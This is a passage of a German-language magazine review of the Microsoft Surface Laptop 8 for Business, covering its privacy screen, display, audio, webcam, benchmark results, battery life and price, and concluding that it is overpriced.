<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.33.55.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195215" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Modell-Chaos</h2>



<p>Der Microsoft Surface Laptop 8 ist mit Bildschirmdiagonalen von 13,8 Zoll und 15 Zoll erhältlich. Microsoft vertreibt das Modell offiziell als “Surface Laptop for Business (8. Generation)” oder “Surface Laptop 8 for Business”.</p>



<p>Sie können den Surface Laptop for Business auch mit einem 13-Zoll-Display kaufen. Microsoft hat den Surface Laptop bisher noch nie mit einer solchen Bildschirmgröße angeboten, weshalb er schlicht als <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">Surface Laptop for Business 13 Zoll</a> bezeichnet wird.</p>



<p>Durch den Kauf des kleineren Surface Laptops sparen Sie mehrere hundert Euro (die Preise beginnen bei 1.549 Euro, im Vergleich zu 2.119 Euro für den 13,8-Zoll-Surface Laptop 8). Die Auswahl der Komponenten beschränkt sich dann jedoch auf einen Core Ultra 5 325-Prozessor, bis zu 24 Gigabyte RAM und bis zu einem Terabyte SSD-Speicher.</p>



<p>Auf dem Papier und in der Hand ist der Surface Laptop 8 for Business im Wesentlichen identisch mit dem <a href="https://www.pcwelt.de/article/2380548/surface-laptop-7-test-eine-neue-ara-fur-windows-laptops.html" target="_blank">Surface Laptop 7</a> aus dem Jahr 2024, der ab 1.199 Euro angeboten wurde. Zugegeben, dabei handelte es sich um eine Consumer-Version des Surface Laptop mit einem Snapdragon X1 Elite. Das ändert jedoch nichts daran, dass sich der Einstiegspreis im Vergleich zu vor zwei Jahren fast verdoppelt hat. Das macht das neue Gerät deutlich unattraktiver.</p>



<h2 class="wp-block-heading">Kombination aus Alt und Neu</h2>



<p>Das Design des Surface Laptop hat sich seit Jahren kaum verändert. Direkt nach dem Auspacken liegt der Laptop angenehm in der Hand, während das glänzende Aluminiumgehäuse nun aus bis zu 64 Prozent recyceltem Material besteht. Da es jedoch leicht Fingerabdrücke anzieht, sollten Sie ein Mikrofasertuch immer griffbereit halten. Ich empfinde das Gewicht von 1,35 Kilogramm weder in der Hand noch in meinem Rucksack als unangenehm. Hier kann ich Entwarnung geben.</p>



<p>In einigen Aspekten unterscheidet sich der Surface Laptop 8 for Business von seinen Vorgängern. Da wäre zunächst der Prozessor: eine Leistungssteigerung durch den <a href="https://www.pcwelt.de/article/3025897/intel-core-ultra-series-3-laptop-chips.html" target="_blank">Intel Core Ultra Series 3-Chip</a>, bekannt als Panther Lake.</p>



<p>Zu den verfügbaren Ausführungen gehören sowohl die Basis-Konfigurationen mit Core Ultra 5 und 7 als auch der Core Ultra X7 368, der über Intels leistungsstarke integrierte GPU verfügt. Lassen Sie sich davon jedoch nicht allzu sehr verunsichern. Bei längerem Betrieb wird die Grafikeinheit durch die begrenzte Kühlung im Laptop thermisch erheblich gedrosselt.</p>



<p>Zudem gibt es eine merkwürdige Auslassung: Die Surface-App, mit der sich die Ladeoptionen des Akkus sowie einige weitere Einstellungen verwalten lassen, fehlt. Ich musste sie von Hand <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">aus dem Microsoft Store herunterladen</a>.</p>



<p>Außerdem bietet Microsoft als Option die “Privacy Screen”-Technologie an, die exklusiv für die 13,8-Zoll-Version verfügbar ist.</p>



<p>Im Wesentlichen funktioniert die “Privacy Screen”-Technologie des Surface Laptops, ähnlich wie die “Privacy Display” getaufte Funktion auf dem neuen <a href="https://www.pcwelt.de/article/3084372/samsung-galaxy-s26-ultra-test-2.html" target="_blank">Galaxy S26 Ultra</a> von Samsung.</p>



<p>Sie wird über eine neue Taste auf der Tastatur aktiviert, die als F1-Taste neben der Esc-Taste in der obersten Reihe angeordnet ist. Drückt man diese Taste, wird das Display dunkler und passt sich so an, dass es von den Seiten her schwerer lesbar ist. Microsoft erklärt <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">an dieser Stelle</a>, wie der Blickschutz funktioniert, ohne dabei die genaue Funktionsweise zu erläutern.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.33.59.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195220" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Die Datenschutztechnologie nutzt die Fähigkeit des Laptops, die Helligkeit des Displays sowohl entsprechend den Präferenzen des Benutzers als auch in Abhängigkeit vom Umgebungslicht anzupassen. Je dunkler das Display, desto schwieriger wird es für neugierige Passanten, etwas auf dem Bildschirm zu erkennen.</p>



<p>In meinen Tests waren die Ergebnisse nicht eindeutig. In einem abgedunkelten Raum, wurde das Display aus einer Entfernung von einem Meter ab einem seitlichen Winkel von etwa 15 Grad zur Displayachse so dunkel, dass es fast nicht mehr zu erkennen war.</p>



<p>In einem helleren Raum blieb ein größerer Teil des Bildschirminhalts erkennbar. Ich konnte jedoch immer gut erkennen, um welche Art von Inhalt es sich auf dem Bildschirm handelte, auch wenn ich den eigentlichen Text nicht mehr lesen konnte. Ein Teil des Bildschirms blieb immer relativ gut sichtbar, es sei denn, ich saß sehr weit entfernt.</p>



<p>Es ist schwer zu beurteilen, wie effektiv der Blickschutz wirklich ist. Die Wirksamkeit schwankte im selben Raum unter den gleichen Bedingungen einfach zu sehr. Schauen Sie sich einfach mal die folgenden Vergleiche an. Im ersten Beispiel musste ich die Perspektive leicht verändern.</p>



<p>Aus dieser Perspektive scheint der Blickschutz kaum eine Wirkung zu entfalten. Ich habe mir dabei vorgestellt, wie es aus dem Blickwinkel einer Person aussehen würde, die auf einem Gangplatz im Flugzeug sitzt und beiläufig zu meinem Sitz über den Gang hinweg blickt. Aus dieser Perspektive glaube ich nicht wirklich, dass der Blickschutz von Microsoft wirklich funktioniert.</p>



<p>Aus einem anderen Blickwinkel betrachtet sind die Ergebnisse aber gar nicht so schlecht. Es wäre hilfreich gewesen, wenn Microsoft genau mitgeteilt hätte, in welchen Situationen der Blickschutz am wirksamsten arbeitet. In einem abgedunkelten Flugzeug, bei eingeschalteter Deckenbeleuchtung? In einem relativ hellen Raum wie meinem Büro?</p>



<p>In einem schlechter beleuchteten Raum schien der Blickschutz wirksamer zu arbeiten. Aber sollten Sie wirklich Ihre Arbeitsbedingungen anpassen müssen, um von dieser Funktion zu profitieren?</p>



<p>Zudem ist mir eine leichte Fleckbildung auf dem Display aufgefallen, die aussieht wie ein schwacher, staubiger Schleier im Displayglas. Ich vermute, dass dies an der Beschaffenheit des Sichtschutzglases selbst liegt.</p>



<p>Vielleicht wurden hierfür einige der Pixel leicht versetzt? Das Ergebnis ist jedoch deutlich sichtbar: Eine weiße Webseite wirkt bei direkter Betrachtung leicht staubig. Dies ist nicht störend oder ablenkend, aber es war auffällig.</p>



<p>Was die Ein- und Ausgänge betrifft, ist die Ausstattung des Surface Laptop 8 for Business recht übersichtlich: An der linken Seite befinden sich zwei Thunderbolt-4-/USB-C-Anschlüsse, über die mit dem entsprechenden Dock drei 4K-Displays mit 60 Hertz betrieben werden können.</p>



<p>Die Anordnung sorgt jedoch dafür, dass ein Nutzer, der die Maus mit der linken Hand bedient, sich den Platz mit den Displaykabeln teilen muss. Außerdem gibt es einen USB-A-Anschluss und eine Kopfhörerbuchse.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.06.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195221" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Auf der rechten Seite befindet sich der Surface Connect-Anschluss, der beim kleineren Surface Laptop und beim neuen Surface Pro weggefallen ist. Das bedeutet, dass Sie das Gerät entweder mit so gut wie jedem handelsüblichen USB-C-Ladegerät oder mit dem mitgelieferten winzigen 60-Watt-Surface-Ladegerät wieder aufladen können.</p>



<p>Insgesamt wirkt das Design des Surface Laptop 8 for Business robust und gut verarbeitet. Es ist jedoch erwähnenswert, dass das Kühlsystem im Vergleich zu früheren Generationen gänzlich unverändert geblieben ist: Die Luft strömt durch Lüftungsgitter im Scharnier nach außen.</p>



<p>Selbst bei der Standardeinstellung des Laptops (Beste Energieeffizienz) musste ich nicht viel am Rechner tun, damit sich der Lüfter einschaltete. Unter Last war das Lüftergeräusch jedoch meist unauffällig.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.10.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195223" width="1024" height="636" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Bildschirm</h2>



<p>Kurzum, mir gefällt der Bildschirm des Surface Laptop 8 for Business einfach nicht.</p>



<p>Auf dem Papier macht das Display noch einen guten Eindruck: Das HDR-Display bietet Dolby Vision IQ-Unterstützung mit adaptiver Farb- und Kontrastanpassung von bis zu 1300:1. Microsoft bietet zwei Anzeigemodi an: sRGB und „Vivid“. Der Hersteller gibt an, dass eine Helligkeit von bis zu 600 Nits erreicht werden kann. Ich habe insgesamt eine Leuchtdichte von 491 Nits gemessen, die jedoch bei aktiviertem Sichtschutz auf 163 Nits sank.</p>



<p>Der Farbraum ist recht gut und blieb sowohl bei aktiviertem als auch bei deaktiviertem Sichtschutz unverändert.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.21.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195224" width="1024" height="631" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Der Surface Laptop 8 for Business bietet ein Touch-Display. Dieses ist jedoch nur für die Bedienung mit dem Finger ausgelegt. Eine Eingabe per Stift wird nicht unterstützt. Das Display lässt sich ohnehin nicht vollständig zurückklappen, was die Verwendung eines Stifts schwer machen würde.</p>



<p>Was ich am Bildschirm besonders schätze, ist eine oft unterschätzte Funktion: Die variable Bildwiederholfrequenz reicht von 120 Hertz bis hinunter auf 24 Hertz. Das ist großartig. Das 120-Hertz-Display erhöht die Bildwiederholfrequenz, wenn Sie es aktiv nutzen. Dadurch werden Mausbewegungen oder Spiele mit einer höheren Bildwiederholfrequenz dargestellt, was zu flüssigeren Bewegungen führt.</p>



<p>Wenn Sie auf einen statischen Bildschirm schauen, sinkt die Bildwiederholfrequenz auf 24 Hertz – weniger als die herkömmlichen 60 Hertz. Das senkt den Stromverbrauch, ohne dass Sie es wirklich bemerken. Der Akku hält entsprechend länger durch.</p>



<p>Der Bildschirm wirkt allerdings etwas trüb, und es gibt eine leichte Fleckenbildung, die durch den Sichtschutz verursacht wird. Dies sorgt dafür, dass die Auflösung niedriger wirkt, als sie tatsächlich ist. Mit einer Kamera lässt sich dieses Manko nicht wirklich einfangen. Vielleicht bin ich durch die neue Generation von OLED-Displays auch einfach zu verwöhnt. Doch aus meiner Sicht lässt dieser Bildschirm einfach zu viele Wünsche offen.</p>



<h2 class="wp-block-heading">Ton und Mikrofone</h2>



<p>Microsofts Surface-Geräte gehörten zu den ersten Laptops, die mit ihrer Audioqualität überzeugen konnten. Daran hat sich nichts geändert. Die integrierten Omnisonic-Lautsprecher unterstützen Dolby Atmos und bieten mehr Lautstärke, als für einen kleinen Raum nötig wäre. Der Sound klang zwar etwas flacher, als ich ihn in Erinnerung hatte.</p>



<p>Dennoch benötigen Sie für diesen Laptop nicht unbedingt Kopfhörer. Die Audioqualität der verbauten Lautsprecher ist über den gesamten Frequenzbereich hinweg recht gut.</p>



<p>Die beiden Studio-Mikrofone sorgen für eine neue Funktion namens “Voice Focus“. Diese soll in bestimmten, aber nicht näher genannten Anwendungen unterstützt werden. Der Algorithmus konzentriert sich dabei auf Ihre Stimme und nicht auf Geräusche im Hintergrund. Um diese Funktion auszuprobieren, nahm ich meine Stimme mit der Windows-App “Sound Recorder” auf, während ich im Hintergrund Musik und weißes Rauschen abspielte.</p>



<p>Beide Hintergrundgeräusche blieben noch etwas hörbar. Das weiße Rauschen wurde deutlich besser herausgefiltert als der Gesang im Hintergrund. Hier wusste die Software einfach nicht, ob sie die abgespielte Musik beibehalten oder ausblenden sollte. Die meisten neuen Asus-Laptops bieten eine noch bessere Geräuschfilterung.</p>



<h2 class="wp-block-heading">Tastatur und Touchpad</h2>



<p>Die Tastatur gehörte einst auch zu den Aspekten, die ein Surface-Gerät ausgezeichnet haben. Mittlerweile haben die anderen Hersteller jedoch aufgeholt. Mir sind dennoch keine Mängel an der Tastatur des Surface Laptop 8 for Business aufgefallen. Sie ist nicht deutlich besser oder schlechter als andere gute Laptop-Tastaturen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.33.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195225" width="1024" height="722" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Der neue Surface Laptop verfügt über die haptischen Touchpads, die Microsoft vor einigen Jahren eingeführt hat. Diese lassen sich über die gesamte Fläche anklicken. Dies ist im Vergleich zu herkömmlichen Touchpads ein echter Pluspunkt. Microsoft arbeitet zudem daran, ein subtiles haptisches Feedback auszulösen, wenn der Mauszeiger über bestimmte Bildschirmelemente bewegt wird, wie das “X” zum Schließen eines Fensters. Der Effekt ist sehr unauffällig, aber dennoch ein nettes kleines Detail.</p>



<p>Das Touchpad lässt sich zudem über die Surface-App anpassen. Diese war auf meinem Testgerät jedoch nicht vorinstalliert. Die App kann jedoch <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">kostenlos aus dem Microsoft Store</a> heruntergeladen werden. Mit der Software können Sie festlegen, welcher Bereich des Surface-Touchpads auf Rechts- und Linksklicks reagiert.</p>



<h2 class="wp-block-heading">Webcam</h2>



<p>Der Surface Laptop 8 for Business verfügt über eine 1080p-Kamera, die die Windows Studio-Effekte wie Hintergrundunschärfe, Bildausschnitt, Blickkontakt und mehr unterstützt. Außerdem bietet sie die Gesichtserkennung, einen wesentlichen Bestandteil der <a href="https://www.pcwelt.de/article/2480916/warum-sie-windows-hello-verwenden-sollten-um-ihren-pc-zu-sichern.html" target="_blank">Windows Hello-Technologie</a>. Während des Testzeitraums hatte ich keinerlei Probleme mit der Anmeldung über die Kamera.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.34.53.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195226" width="1024" height="596" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Da es sich um eine “Business”-Kamera handelt, erwartet man von der Webcam eine professionelle Darstellung unter verschiedenen Lichtverhältnissen. Und unter der hellen LED-Beleuchtung meines Büros funktioniert dies auch gut.</p>



<p>Hier habe ich die Webcam sowohl im hellen Licht unseres Büros als auch bei natürlicherer Beleuchtung in meiner Wohnung getestet.</p>



<p>Offen gestanden war ich von den Ergebnissen nicht sonderlich beeindruckt. Bei natürlicher Beleuchtung (der Himmel war an diesem Tag bewölkt) schnitt die Webcam recht gut ab, obwohl das Bild körniger war, als ich es erwartet hätte. Im Büro wirkte das Bild der Kamera jedoch etwas blass.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.01.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195227" width="1024" height="564" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Leistung</h2>



<p>Derzeit zählt der Intel Core Ultra 300 (<a href="https://www.pcwelt.de/article/2937427/intel-panther-lake-laptop-cpu.html?gad_source=1&amp;gad_campaignid=23842067659&amp;gclid=Cj0KCQjwi8nRBhDhARIsAHZf_pb7YWtNKos2TT2Azmce-HO0WHiai6SycmExhDbngIoE4SM7zBW4V3gaAs7_EALw_wcB" target="_blank">Panther Lake</a>) zu den besten Premium-Laptop-Prozessoren, die Sie im Jahr 2026 kaufen können. Den kürzlich vorgestellten AMD Ryzen AI 400-Prozessor konnten wir noch nicht in einem marktreifen Laptop finden.</p>



<p>Bislang durften wir Panther Lake jedoch nur in größeren Produktivitäts-Laptops mit überlegenen Kühlungslösungen wie dem <a href="https://www.pcwelt.de/article/3025832/die-10-besten-laptops-der-ces-2026.html" target="_blank">Asus ZenBook Duo</a> ausprobieren. Zum besseren Verständnis: Läuft ein Laptop über einen längeren Zeitraum unter hoher Last, kann sich die Performance durch Drosselung reduzieren. Auf diese Weise soll eine gefährliche Überhitzung verhindert werden. Im Fall des Surface Laptop 8 ist dies ein Punkt, auf den Sie besonders achten sollten.</p>



<p>Der Cinebench-2024-CPU-Benchmark umfasst einen “Thermal-Throttling”-Test. Dabei wird der Benchmark wiederholt über einen Zeitraum von zehn Minuten ausgeführt. In diesem Szenario ist eine verminderte Leistung ein Hinweis auf thermische Drosselung. Sie können dann einen einzelnen Durchlauf mit dem Langzeittest vergleichen. So kann festgestellt werden, ob eine Drosselung auftritt. In unserem Fall sank die CPU-Leistung bei einem Vergleich von 773 auf 689 Punkte.</p>



<p>Mit dem 3DMark-Grafiktest lässt sich ebenfalls ein Langzeittest durchführen – in diesem Fall zwanzig Benchmark-Durchläufe – und die Leistung im Verlauf des Tests vergleichen. Hier war der Unterschied noch größer.</p>



<p>Der Benchmark erzielte beim ersten Durchlauf die höchste Punktzahl, fiel dann bei den nachfolgenden Durchläufen auf etwa die Hälfte der Leistung ab und verblieb während der folgenden Testläufe auf diesem Niveau.</p>



<p>Was sagt uns das? In gewisser Weise sind Leistungswerte oft irreführend. Der Surface Laptop 8 funktioniert am zuverlässigsten in kurzen, intensiven Phasen, zumindest was das Gaming betrifft.</p>



<p>Für längere Sitzungen ist das Gerät weniger gut geeignet. Andererseits scheint die Kühlung für CPU-intensive Aufgaben auszureichen. Zu diesen Aufgaben zählen unter anderem das Betriebssystem, das Komprimieren und Dekomprimieren von Dateien sowie allgemeine Anwendungen ohne viele visuelle Elemente. Beachten Sie, dass wir zwar die NPU-Fähigkeiten des Laptops nicht testen, er sich mit seinen 50 TOPS jedoch als <a href="https://www.pcwelt.de/article/2819676/copilot-pc-lohnt-sich-der-kauf-eines-ki-rechners-das-mussen-sie-wissen.html" target="_blank">Copilot-PC</a> qualifiziert.</p>



<p>Ich habe den Surface Laptop 8 for Business mit mehreren 14-Zoll-Laptops der jüngsten Generation verglichen: dem <a href="https://www.pcwelt.de/article/2479359/acer-swift-14-ai-laptop-test.html" target="_blank">Acer Swift X 14 AI</a> und dem verwandten Modell <a href="https://www.pcwelt.de/article/3048294/acer-swift-edge-14-ai-test.html" target="_blank">Acer Swift Edge 14 AI</a>.</p>



<p>Hinzu kamen zwei Panther-Lake-Laptops: der <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">Dell XPS 14</a> und der <a href="https://www.pcwelt.de/article/3072282/msi-prestige-flip-14-ai-test.html" target="_blank">MSI Prestige Flip 14 AI</a>. Schließlich habe ich noch zwei Snapdragon-Laptops hinzugefügt: den <a href="https://www.pcwelt.de/article/2380548/surface-laptop-7-test-eine-neue-ara-fur-windows-laptops.html" target="_blank">Surface Laptop 7</a> (2024) mit einem Snapdragon X1 Elite-Chip der ersten Generation sowie den <a href="https://www.pcwelt.de/article/2403490/lenovo-yoga-slim-7x-test.html" target="_blank">Lenovo Yoga Slim 7x Gen 11</a>, der mit einem Snapdragon X2 Elite Extreme-Chip der zweiten Generation ausgestattet ist.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.14.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195228" width="1024" height="588" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Der PCMark-10-Test deckt ein breites Spektrum ab, das von Videoanrufen über das Surfen im Internet hin zu CAD-Anwendungen und einigen weniger anspruchsvollen Spielen reicht.</p>



<p>Aufgrund der Vielfalt der getesteten Anwendungen ist dieser Benchmark nach wie vor relevant. Der Surface Laptop profitiert ein wenig von seiner leistungsstarken integrierten GPU, obwohl es sich hierbei in erster Linie um CPU-orientierte Tests handelt.</p>



<p>Für andere Tests, die sich nicht mit PCMark messen lassen, verwenden wir stattdessen Cinebench 2024. Obwohl es eine Version für 2026 gibt, nutzen wir aus Kompatibilitätsgründen weiterhin Cinebench 2024. Auch hier gilt: Panther Lake ist eine leistungsstarke CPU, die bei kurzer Spitzenlast eine hohe Leistung bietet.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.25.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195229" width="1024" height="475" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Dieser ausgedehnte Cinebench-Stresstest verdeutlicht jedoch, dass Sie bei längerer Nutzung mit einer geringeren CPU-Leistung rechnen müssen.</p>



<p>Handbrake war ursprünglich der Test, mit dem wir bewerteten, wie gut sich der Laptop und sein Prozessor über einen längeren Zeitraum behaupten können. Die App selbst ist nützlich, auch wenn sie schon älter ist.</p>



<p>Sie transkodiert lediglich eine Videodatei in ein Format, das für die Speicherung auf einem Tablet verwendet wird. Angesichts der Verbreitung von Streaming-Apps findet diese Transkodierung mittlerweile meist im Hintergrund statt. Dennoch ist sie ein wirksames Maß für die dauerhafte CPU-Leistung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.36.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195230" width="1024" height="436" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Unser traditioneller Maßstab für die 3D-Leistung ist der “Time Spy”-Benchmark von 3DMark. Dieser misst die 3D-Leistung auf eine Weise, die ein echtes 3D-Spiel simuliert. Auch hier würde ich erwarten, dass der Surface Laptop recht gut abschneidet – und das tut er auch.</p>



<p>Allerdings sind mir bei den von diesem Laptop gemeldeten Ergebnissen einige übermäßige Schwankungen aufgefallen. Nach einem Kaltstart stiegen die Benchmark-Ergebnisse auf einen Höchstwert von 7.063. Im niedrigsten Fall sank das Ergebnis auf 4.601. Nach jedem Durchlauf ließ ich den Laptop zehn Minuten lang abkühlen.</p>



<p>Bei diesem Gerät zeigen die Ergebnisse jedoch einen deutlichen Unterschied zwischen der Durchführung des Benchmarks zu Beginn des Tages und der Durchführung nach einer Abkühlphase von zehn Minuten im Anschluss an eine Reihe anderer Benchmarks. Dies ist ein ungewöhnliches Verhalten und ein echter Minuspunkt. Ich gehe einfach immer davon aus, dass ein hochwertiger Laptop eine konstante Leistung abliefern kann.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.44.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195231" width="1024" height="351" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Da es sich beim Surface Laptop 8 um ein Produktivitätsgerät handelt, habe ich ihn im Hinblick auf Gaming nicht ausgiebig getestet. Allerdings machen Intels XeSS-Upscaling und die Frame-Generierung einen enormen Unterschied.</p>



<p>“Cyberpunk: 2077”, getestet bei einer Auflösung von 1.920 × 1.080 Pixeln und der Einstellung „Low“, erzielte mit der reinen Render-Engine des Spiels eine durchschnittliche Bildrate von 50 Bildern pro Sekunde. Das ist ein schon relativ gut spielbares Ergebnis. Mit aktivierten Zusatzfunktionen stieg die Bildrate jedoch auf 133 Bilder pro Sekunde – was mehr als spielbar ist.</p>



<p>Bitte beachten Sie, dass der Benchmark nur etwa eine Minute lang läuft. Daher ist bei längerem Spielen mit einem Rückgang der Bildrate zu rechnen.</p>



<p>Bei einem Produktivitäts-Laptop lege ich Wert auf außergewöhnliche Leistung. Aber die Akkulaufzeit ist ebenso wichtig. Einige der ersten Panther-Lake-Laptops, die ich getestet habe, verfügten über riesige 99-Wattstunden-Akkus – das zulässige Maximum in Flugzeugen.</p>



<p>Um das Gewicht gering zu halten, lieferte Microsoft den Surface Laptop 8 for Business mit einem 52-Wattstunden-Akku aus. Das wirkt sich natürlich auf die Akkulaufzeit aus, wenn auch nicht dramatisch. Es macht mir keine Sorgen, dass ich für eine Akkulaufzeit von 17,3 Stunden etwas weniger Gewicht mit mir herumschleppen muss. Bei produktiver Arbeit könnte die Laufzeit aber etwas niedriger ausfallen als in unseren Tests.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.35.52.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195232" width="1024" height="415" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Preis und Verfügbarkeit</h2>



<p>Zum Zeitpunkt der Veröffentlichung ist der Surface Laptop 8 for Business <a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html#" target="_blank">nur bei Microsoft selbst</a> und wenigen anderen Händlern erhältlich. Der Einstiegspreis für das 13,8-Zoll-Modell liegt beim Hersteller bei 2.119 Euro. Dafür gibt es 16 Gigabyte RAM und 256 Gigabyte Speicherplatz. Mit 512-Gigabyte-SSD klettert der Preis auf 2.239 Euro.</p>



<p>Optional ist für ausgewählte 13,8-Zoll-Konfigurationen der integrierte Privacy Screen erhältlich. Ob diese Variante in Deutschland verfügbar ist, geht aus dem Microsoft Store derzeit nicht eindeutig hervor. Als Option steht der Blickschutz bei der Konfiguration noch nicht zur Verfügung.</p>



<h2 class="wp-block-heading">Fazit</h2>



<p>Würde man den Preis um etwa 1.000 Euro senken, dann ließe sich der Kauf des aktuellen Surface Laptop 8 for Business eher rechtfertigen. So ist dieser Laptop aber einfach viel zu teuer, um ihn zu empfehlen – selbst für die geschäftliche Nutzung.</p>



<p>Es ist erwähnenswert, dass die Laptops, mit denen wir den Surface Laptop primär vergleichen, auch erst kürzlich ausgeliefert wurden. Dadurch sind auch diese Geräte ebenfalls von den Kostensteigerungen bei Arbeitsspeicher und SSD-Speicher betroffen.</p>



<p>Bietet der Surface Laptop ansonsten etwas Überzeugendes? Abgesehen vom Blickschutzbildschirm eigentlich nicht wirklich. Was Leistung und Akkulaufzeit angeht, so gibt es viele Laptops, die diese Werte bei deutlich geringeren Anschaffungskosten sogar übertreffen.</p>



<p>Tatsächlich wirkt diese Generation der Surface-Laptops etwas unentschlossen. Privatkunden würden wahrscheinlich eine etwas leistungsstärkere Grafikeinheit für Spiele bevorzugen, während Geschäftsreisende eher auf eine starke CPU-Leistung Wert legen dürften. Das werden wir wahrscheinlich beim kommenden Surface Laptop für Privatkunden sehen, der vermutlich mit einem Qualcomm Snapdragon X2 Elite-Chip ausgestattet sein wird. Die Akkulaufzeit dürfte in etwa gleich bleiben.</p>



<p>Ich habe das Gefühl, dass ich bereits ausreichend Worte über diesen Laptop verloren habe. Er ist überteuert. Kaufen Sie ihn nicht.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li><strong>Prozessor: Core </strong>Ultra 5 335, Core Ultra 7 366H, Core Ultra X7 368H (getestet: 368H)</li>



<li><strong>Display:</strong> 13,8 Zoll (2.304 × 1.536 Pixel) PixelSense Flow, 24–120 Hertz, Dolby Vision, entspiegelt nach ISO-9241 oder blendfrei mit integriertem Blickschutz (getestet)</li>



<li><strong>Arbeitsspeicher:</strong> 16 Gigabyte/32 Gigabyte/64 Gigabyte LPDDR5X (getestet: 16 Gigabyte)</li>



<li><strong>Speicher:</strong> 256 Gigabyte/512 Gigabyte/1 Terabyte PCIe Gen 4 M.2 NVMe SSD (getestet: 512 Gigabyte)</li>



<li><strong>Grafikkarte:</strong> Iris Arc B390</li>



